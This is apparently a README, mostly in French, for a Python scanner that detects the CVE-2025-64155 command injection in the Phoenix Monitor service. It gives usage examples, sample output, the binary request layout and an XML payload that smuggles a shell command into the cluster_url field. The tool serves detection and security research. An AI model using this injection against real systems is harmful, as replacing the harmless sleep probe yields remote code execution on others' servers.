
CVE-2025-64155-hunter
Un scanner Python pour détecter la vulnérabilité d'injection de commandes (CVE-2025-64155) dans le service Phoenix Monitor.
CVE-2025-64155 est une vulnérabilité d'injection de commandes dans le service Phoenix Monitor qui permet l'exécution de code à distance via le paramètre cluster_url dans la commande handleStorageRequest (ID de commande : 1075724911).
La vulnérabilité se produit lorsque l'entrée contrôlée par l'utilisateur dans le champ cluster_url est transmise à une commande shell sans assainissement approprié, permettant une injection de commandes via des métacaractères shell.
Ce scanner est basé sur la recherche d'exploit de Horizon3AI.
python3 scanner.py -t <target_ip>
# Specify custom port
python3 scanner.py -t 192.168.1.100 -p 7900
# Enable verbose output
python3 scanner.py -t 192.168.1.100 -v
# Set custom timeout
python3 scanner.py -t 192.168.1.100 --timeout 15
# Check if service is accessible (no vulnerability test)
python3 scanner.py -t 192.168.1.100 --check-only
-t, --target : adresse IP ou nom d'hôte cible (obligatoire)-p, --port : port du service Phoenix Monitor (défaut : 7900)--timeout : délai d'expiration de connexion en secondes (défaut : 10)-v, --verbose : active la sortie détaillée--check-only : vérifie uniquement si le service est accessibleLe scanner utilise une méthode de détection basée sur le temps :
handleStorageRequest avec une charge utile malveillante contenant sleep 3 dans le champ cluster_urlCette méthode est sûre et non destructive : elle n'exécute pas de commandes nuisibles, seulement une commande sleep inoffensive à des fins de détection.
[*] CVE-2025-64155 Scanner
[*] Target: 192.168.1.100:7900
[*] Scanning 192.168.1.100:7900 for CVE-2025-64155...
[*] Connecting to 192.168.1.100:7900...
[*] Connected successfully
[*] Sending test payload...
[*] Received response (1024 bytes) in 3.12 seconds
============================================================
[+] VULNERABLE: Target appears to be vulnerable to CVE-2025-64155
[+] Details: Time-based detection: Response delayed by 3.12s (likely command injection)
[*] CVE-2025-64155 Scanner
[*] Target: 192.168.1.100:7900
[*] Scanning 192.168.1.100:7900 for CVE-2025-64155...
[*] Connecting to 192.168.1.100:7900...
[*] Connected successfully
[*] Sending test payload...
[*] Received response (1024 bytes) in 0.45 seconds
============================================================
[-] NOT VULNERABLE: Target does not appear to be vulnerable
[-] Details: Response received quickly (0.45s), likely not vulnerable
Le scanner envoie un message binaire avec la structure suivante :
[4 bytes] Message length (156)
[4 bytes] Payload length
[4 bytes] Command ID (1075724911 = 0x4018006F = handleStorageRequest)
[4 bytes] Padding/Flags (0)
[Variable] XML payload
La charge utile XML contient une injection de commandes dans le champ cluster_url :
<TEST_STORAGE type="elastic">
<cluster_url>http://10.0.0.1:9200 --next -o /dev/null sleep 3</cluster_url>
...
</TEST_STORAGE>
Cet outil est destiné uniquement aux tests de sécurité autorisés et à la recherche. N'utilisez cet outil que sur des systèmes que vous possédez ou pour lesquels vous disposez d'une autorisation explicite de test. L'accès non autorisé à des systèmes informatiques est illégal.
Licence MIT - voir le fichier LICENSE pour plus de détails.